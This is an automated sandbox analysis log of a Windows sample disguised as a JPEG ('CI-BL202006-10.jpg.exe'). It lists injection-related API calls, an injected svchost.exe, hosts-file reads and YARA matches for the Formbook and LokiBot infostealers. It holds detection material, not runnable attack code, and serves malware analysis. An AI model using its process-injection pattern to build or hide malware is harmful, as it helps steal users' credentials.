      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A310 NtEnumerateValueKey,7_2_1F45A310
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A3D0 NtCreateKey,7_2_1F45A3D0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A260 NtWriteFile,7_2_1F45A260
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A220 NtWaitForSingleObject,7_2_1F45A220
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45BA30 NtSetContextThread,7_2_1F45BA30
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A2F0 NtQueryInformationFile,7_2_1F45A2F0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45A800 NtSetValueKey,7_2_1F45A800
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F45B0B0 NtGetContextThread,7_2_1F45B0B0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00561477 NtProtectVirtualMemory,7_2_00561477
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00561400 Sleep,NtProtectVirtualMemory,7_2_00561400
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00560D67 CreateThread,TerminateThread,NtProtectVirtualMemory,7_2_00560D67
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00560DC0 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory,7_2_00560DC0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00562DF6 NtSetInformationThread,7_2_00562DF6
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00562A49 NtProtectVirtualMemory,7_2_00562A49
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00561470 NtProtectVirtualMemory,7_2_00561470
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00562DFC NtSetInformationThread,7_2_00562DFC
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_005601E6 LdrInitializeThunk,NtSetInformationThread,7_2_005601E6
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A310 NtEnumerateValueKey,LdrInitializeThunk,9_2_0306A310
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A350 NtQueryValueKey,LdrInitializeThunk,9_2_0306A350
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A360 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_0306A360
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A3D0 NtCreateKey,LdrInitializeThunk,9_2_0306A3D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A3E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_0306A3E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A240 NtReadFile,LdrInitializeThunk,9_2_0306A240
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A2D0 NtClose,LdrInitializeThunk,9_2_0306A2D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A800 NtSetValueKey,LdrInitializeThunk,9_2_0306A800
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A750 NtCreateFile,LdrInitializeThunk,9_2_0306A750
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A610 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_0306A610
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A6A0 NtCreateSection,LdrInitializeThunk,9_2_0306A6A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A540 NtDelayExecution,LdrInitializeThunk,9_2_0306A540
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A560 NtQuerySystemInformation,LdrInitializeThunk,9_2_0306A560
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A410 NtQueryInformationToken,LdrInitializeThunk,9_2_0306A410
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A480 NtMapViewOfSection,LdrInitializeThunk,9_2_0306A480
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306ACE0 NtCreateMutant,LdrInitializeThunk,9_2_0306ACE0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A370 NtQueryInformationProcess,9_2_0306A370
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A220 NtWaitForSingleObject,9_2_0306A220
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306BA30 NtSetContextThread,9_2_0306BA30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A260 NtWriteFile,9_2_0306A260
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A2F0 NtQueryInformationFile,9_2_0306A2F0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306B0B0 NtGetContextThread,9_2_0306B0B0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A700 NtProtectVirtualMemory,9_2_0306A700
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A710 NtQuerySection,9_2_0306A710
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A720 NtResumeThread,9_2_0306A720
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A780 NtOpenDirectoryObject,9_2_0306A780
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A650 NtQueueApcThread,9_2_0306A650
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A6D0 NtCreateProcessEx,9_2_0306A6D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A520 NtEnumerateKey,9_2_0306A520
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306BD40 NtSuspendThread,9_2_0306BD40
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A5A0 NtWriteVirtualMemory,9_2_0306A5A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A5F0 NtReadVirtualMemory,9_2_0306A5F0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306B410 NtOpenProcessToken,9_2_0306B410
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A430 NtQueryVirtualMemory,9_2_0306A430
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A460 NtOpenProcess,9_2_0306A460
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A470 NtSetInformationFile,9_2_0306A470
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306B470 NtOpenThread,9_2_0306B470
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0306A4A0 NtUnmapViewOfSection,9_2_0306A4A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_02817870 NtAllocateVirtualMemory,9_2_02817870
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_02817690 NtCreateFile,9_2_02817690
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_028177C0 NtClose,9_2_028177C0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_02817740 NtReadFile,9_2_02817740
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0281773A NtReadFile,9_2_0281773A
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 0_2_001C164A0_2_001C164A
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E17467_2_1F4E1746
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E1FCE7_2_1F4E1FCE
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4D27827_2_1F4D2782
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4357907_2_1F435790
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4376407_2_1F437640
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F444E617_2_1F444E61
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4DCE667_2_1F4DCE66
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F445E707_2_1F445E70
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4466117_2_1F446611
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E26F87_2_1F4E26F8
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4D3E967_2_1F4D3E96
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F410D407_2_1F410D40
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4D1D1B7_2_1F4D1D1B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E25197_2_1F4E2519
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4315307_2_1F431530
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4BC53F7_2_1F4BC53F
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4CFDDB7_2_1F4CFDDB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4DD5D27_2_1F4DD5D2
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4C1DE37_2_1F4C1DE3
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4BE58A7_2_1F4BE58A
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4DE5817_2_1F4DE581
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F44547E7_2_1F44547E
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F42740C7_2_1F42740C
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4314107_2_1F431410
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4CF42B7_2_1F4CF42B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4DDCC57_2_1F4DDCC5
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4D44EF7_2_1F4D44EF
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E1C9F7_2_1F4E1C9F
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E2C9A7_2_1F4E2C9A
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4D34907_2_1F4D3490
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F43FB407_2_1F43FB40
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4463C27_2_1F4463C2
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F41EBE07_2_1F41EBE0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F444B967_2_1F444B96
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F444A5B7_2_1F444A5B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4D0A027_2_1F4D0A02
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4EE2147_2_1F4EE214
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F44523D7_2_1F44523D
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E22DD7_2_1F4E22DD
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E1A997_2_1F4E1A99
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4342B07_2_1F4342B0
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F44594B7_2_1F44594B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4699067_2_1F469906
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4471107_2_1F447110
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4D61DF7_2_1F4D61DF
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E19E27_2_1F4E19E2
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4461807_2_1F446180
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4ED9BE7_2_1F4ED9BE
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4410707_2_1F441070
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4498107_2_1F449810
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4DD0167_2_1F4DD016
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F44E0207_2_1F44E020
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4400217_2_1F440021
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4448CB7_2_1F4448CB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4E28E87_2_1F4E28E8
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F42A0807_2_1F42A080
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_1F4C18B67_2_1F4C18B6
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009A9EA7_2_0009A9EA
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00088B3B7_2_00088B3B
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00088B407_2_00088B40
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00082D907_2_00082D90
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009B5BB7_2_0009B5BB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009A6667_2_0009A666
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_0009B6CE7_2_0009B6CE
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: 7_2_00082FB07_2_00082FB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0304FB409_2_0304FB40
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03054B969_2_03054B96
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030563C29_2_030563C2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0302EBE09_2_0302EBE0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030E0A029_2_030E0A02
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030FE2149_2_030FE214
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0305523D9_2_0305523D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03054A5B9_2_03054A5B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F1A999_2_030F1A99
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030442B09_2_030442B0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F22DD9_2_030F22DD
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030799069_2_03079906
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030571109_2_03057110
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0305594B9_2_0305594B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030561809_2_03056180
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030FD9BE9_2_030FD9BE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030E61DF9_2_030E61DF
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F19E29_2_030F19E2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030598109_2_03059810
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030ED0169_2_030ED016
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030500219_2_03050021
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0305E0209_2_0305E020
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030510709_2_03051070
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0303A0809_2_0303A080
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030D18B69_2_030D18B6
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030548CB9_2_030548CB
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F28E89_2_030F28E8
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F17469_2_030F1746
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030E27829_2_030E2782
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030457909_2_03045790
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F1FCE9_2_030F1FCE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030566119_2_03056611
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030476409_2_03047640
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03054E619_2_03054E61
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030ECE669_2_030ECE66
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03055E709_2_03055E70
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030E3E969_2_030E3E96
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F26F89_2_030F26F8
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030E1D1B9_2_030E1D1B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F25199_2_030F2519
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030CC53F9_2_030CC53F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030415309_2_03041530
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03020D409_2_03020D40
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030CE58A9_2_030CE58A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030EE5819_2_030EE581
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030DFDDB9_2_030DFDDB
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030ED5D29_2_030ED5D2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030D1DE39_2_030D1DE3
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0303740C9_2_0303740C
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030414109_2_03041410
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030DF42B9_2_030DF42B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0305547E9_2_0305547E
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F1C9F9_2_030F1C9F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030F2C9A9_2_030F2C9A
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030E34909_2_030E3490
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030EDCC59_2_030EDCC5
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_030E44EF9_2_030E44EF
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_02808B3B9_2_02808B3B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_02808B409_2_02808B40
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0281A9EA9_2_0281A9EA
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0281B6CE9_2_0281B6CE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0281A6669_2_0281A666
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_02802FB09_2_02802FB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_02802D909_2_02802D90
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0281B5BB9_2_0281B5BB
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: String function: 1F41B0E0 appears 176 times
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: String function: 1F4A5110 appears 38 times
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeCode function: String function: 1F46DDE8 appears 44 times
      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B0E0 appears 176 times
      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030B5110 appears 38 times
      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0307DDE8 appears 44 times
      Source: CI-BL202006-10.jpg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: CI-BL202006-10.jpg.exe, 00000000.00000002.934384210.00000000021E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000000.00000002.934523048.0000000002250000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKLOROFYLECTO.exeFE2X vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000000.00000002.933128546.000000000040E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKLOROFYLECTO.exe vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exeBinary or memory string: OriginalFilename vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000003.1014584683.0000000000936000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesvchost.exej% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000002.1020554597.000000001F69F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000002.1018497842.000000001ECD0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000000.928398840.000000000040E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameKLOROFYLECTO.exe vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exe, 00000007.00000002.1018535878.000000001EE20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs CI-BL202006-10.jpg.exe
      Source: CI-BL202006-10.jpg.exeBinary or memory string: OriginalFilenameKLOROFYLECTO.exe vs CI-BL202006-10.jpg.exe
      Source: C:\Windows\SysWOW64\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
      Source: 00000009.00000002.1181326536.0000000003537000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.1018825557.000000001F1C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.1015418131.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.1178893950.0000000002800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.1177510559.0000000000130000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/1@8/2
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4736:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:64:120:WilError_01
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeFile created: C:\Users\user\AppData\Local\Temp\~DFB4CF2D25706A5AA6.TMPJump to behavior
      Source: CI-BL202006-10.jpg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\CI-BL202006-10.jpg.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: CI-BL202006-10.jpg.exeVirustotal: Detection: 29%
      Source: CI-BL202006-10.jpg.exeReversingLabs: Detection: 20%
      Source: unknownProcess created: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\CI-BL202006-10.jpg.exe 'C:\Users\user\Desktop\CI-BL202006-10.jpg.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
